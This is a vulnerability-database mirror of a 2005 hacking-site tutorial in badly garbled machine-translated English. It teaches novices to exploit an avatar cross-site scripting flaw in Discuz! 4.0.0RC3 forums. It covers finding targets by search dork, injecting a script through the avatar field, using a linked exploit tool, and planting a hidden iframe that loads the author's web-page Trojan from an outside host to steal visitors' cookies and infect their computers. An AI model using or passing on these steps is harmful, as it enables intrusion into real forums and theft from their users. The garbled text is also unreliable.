Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
myhack58佚名MYHACK58:6220053162
HistoryOct 04, 2005 - 12:00 a.m.

For Discuz Forum, the intrusion-vulnerability warning-the black bar safety net

2005-10-0400:00:00
佚名
www.myhack58.com
27
JSON

Recently nothing else, the rookie, set off a Discuz Forum, the invasion of the frenzy of the“movement.” Time trouble the entire security community is boiling endless. However, the site of the webmasters skill fairly agile, low version of the Discuz Forum also useless how long, will be put on a higher version of the forum(Discuz! 4 dot 0. 0RC3 version)to compensate for the vulnerability. But after the author test is successful, draw the advanced version of the Discuz program, is also contains a cross-site intrusion vulnerabilities. Just the method some differences. Below is the author this time the invasion of research experience, why don’t together to see the invasion to bring the“thrill”of!

** One, looking to wear autumn“manual”invasion of the law**

  1. First into GOOGLE or Baidu’s search site, the keyword input at the Powered by Discuz! 4.0. 0RC3, and then click “target”button to enter. You can find numerous using this version of the forum address, where the author pick up a game company’s site as the example to explain. Entering the game company site, click upper right corner “register”tab, the pop-up member user considerations, and the need to wait for the forum to the set reading time, and then“click”below the agree button at registration the user must fill in, fill in their information, and finally click the“Submit”button, you can successfully registered.

  2. Membership registration is successful later, automatically jump to the forum home page. In order to enter the“Control Panel”→“edit personal information”. Open the“Edit Profile”tab, click the below“Forum avatar list”button as shown in Figure 1, displays the forum avatar in all the pictures. Here the author is free to choose a default avatar picture, and the page is saved to the local machine.

! Hackers example note the Discuz Forum of the invasion
Figure 1 of the forum list

  1. In the transfer to the local machine in Notepad form open a saved page, and click on the top“Edit”tab, select“Find”option, the pop-up Find dialog box. In the Find text input “in < FORM action=”character content, and then click the target at the“Find Next”button in the Notepad contents below, choose to the to find the target as shown in Figure 2)。 Then the equal sign behind the fill WWW. GU**NY COM. CN, to fill full submit the page’s URL path. In which the modified page is saved, and then re-open the page and click the “Submit”button. Then go back to the website the“Control Panel Home”tab, and check the picture whether the submission is successful.

! Hackers example note the Discuz Forum of the invasion
Figure 2 code

Tip: due to saved to the local avatar page, use the submitted address is a relative path, so there is need to complement the site’s URL. Otherwise in the Submit page at the same time, it will show path not found 4 0 4 Error. If you have to fill the URL path, and in the local but also the success of the picture submitted to the site, we can bold the description of this site the presence of the Avatar cross-site vulnerabilities, the next step can be carried out across the station’s invasion.

  1. Submit a picture after a successful, using the DreamWeaver web design software will Local the submitted page opens, then click the picture of a Radio space, the selected address of the Read“images/avatars/02.gif the"><script>alert(“qujing reminder: your Station containing the Avatar cross-site vulnerabilities, please take relevant Defense measures!”)</ script > the”code characters. Click on the“File”menu, select“Save”option, you can modify the controls, saved successfully. Then double-click to open the page, select the Avatar of a single selected box, and click the“Submit”button. Program back to the display will prompt: modify success! At the same time refresh the page, the pop-up to the author of the build warnings dialog box, as shown in Figure 3, the last in the Find a popular post a reply about it, as long as when the user opens containing the author’s post, will pop-up as shown in Figure 3 in the warning dialog box now!

! Hackers example note the Discuz Forum of the invasion
Figure 3 error message

Small tip: in the “Control Panel Home”tab, look at the page code. As long as everyone is slightly aware, it is not difficult to find calls < img src=“www.gu**y.com.cn/images/avatars/02.gif” width=“8 3” height=“9 4” border=“0” > the pictures address. The calling code is < img src=“$avatars”characters,so we can construct a Radio control value to modify the selected value. Need to use the DreamWeaver web design software or other web authoring software to modify, in order to automatically escape its format. And don’t use a Notepad form to modify the relevant values, otherwise it will lead to the overall content of the disorder.

Second, workers want good work must first sharpen his device

Maybe tedious manual intrusion method, is not suitable for noobs to use. But no, The author again for all the newbies tailored, a“fool”invasion of the packages. This package’s purpose is to let a wireless base rookie friends, can according to the below description of the method to invasion the premium version of Discuz Forum.

Prerequisites: first, download Discuz! 4.0. 0RC3 exploit tool download address: http://blog.blackwoods.cn/up/DiscuzExploit.exe, download speed slower friend, do not worry about. The software has been included to the current period supporting the disc, also please readers note that check it out!

Step 1. Double-click the download to desktop“exploit tools”icon to bring up the program interface as shown in Figure 4, and then in the second step of the text content, the knock-in manually cross-site successfully address www. gu**y. com. cn/in. After the operation is completed, click below the“Read parameters”button, then you wait a moment after, it appears the Read is successful the dialog box as shown in Figure 5, and click the“OK”button.

! Hackers example note the Discuz Forum in the invasion of(2)
Figure 4 exploit tool

! Hackers example note the Discuz Forum in the invasion of(2)
Figure 5 reads the parameter

Tip: this manual’s invasion, and tools invasion, are using the same site to do a column title to explain. So in the tool’s invasion, about the software interface prompts, the first step is to register for a site user, where already in the manual invasion Registered, and have saved COOKIES on the landing, so the author in order to avoid repeated explanation, the jump in the past. If you are in the vulnerability of the site, it is also not registered users friends, please go to the registered user, then in Step 1 of the method.

Step 2. In the third step of the Cross-Station content at the input to the insertion of malicious code, if at this time you to code knowledge know nothing about, you can refer to the left code assistant, a label of three buttons as shown in Figure 6)。 Here the author, click the“insert an IFrame”button, in the desired Cross-Station content, the emergence of < iframe src=" width=0 height=0></iframe>the character code. Then at < iframe src is equal to the back, fill in the www. fa***d. com\fda. asp URL, this is the author prior to the production of a good web page back door address.

! Hackers example note the Discuz Forum in the invasion of(3)
Figure 6 The code assistant

Small tip: the code Assistant, the“pop-up dialog box”button, the“Read COOKIES”button and insert the“IFrame”button, respectively representative of when a user browses through contain their own posts at the same time, 1. Will pop up as shown in Figure 3 in the warning dialog box. 2. Get the browsing user’s COOKIES information. 3. In the machine load the site the Trojan the relevant information.

Step 3. The input is completed, the other settings remain the default, and then click the“Submit”button. Progress in the implementation of box, will be showing a write the site code of the entire process as shown in Figure 7. The But success also need to see the back of the success tips, party can determine whether the write is successful, where the author waits for ten seconds after the pop success of“conclusions”such as Figure 8)。 Since a malicious address to write successfully, in the exploit Forum take a temptation, a strong title name published, so browse through this post of the user, it can be heavy on the author established a web page Trojan.

! Hackers example note the Discuz Forum in the invasion of(3)
Figure 7 progress in the implementation of

! Hackers example note the Discuz Forum in the invasion of(3)
Figure 8 application

Third, the summary

Discuz! 4 dot 0. 0RC3 version of the Avatar cross-site vulnerabilities, although not the crisis to the entire Forum security, but it will involve forum for the user of the computer Safety. Small then lead to Important Information being stolen, the computer suddenly becomes the broiler on!

Note: this article is the description of the content, just tell everyone this technique, no person shall use this technology to do illegal things.

JSON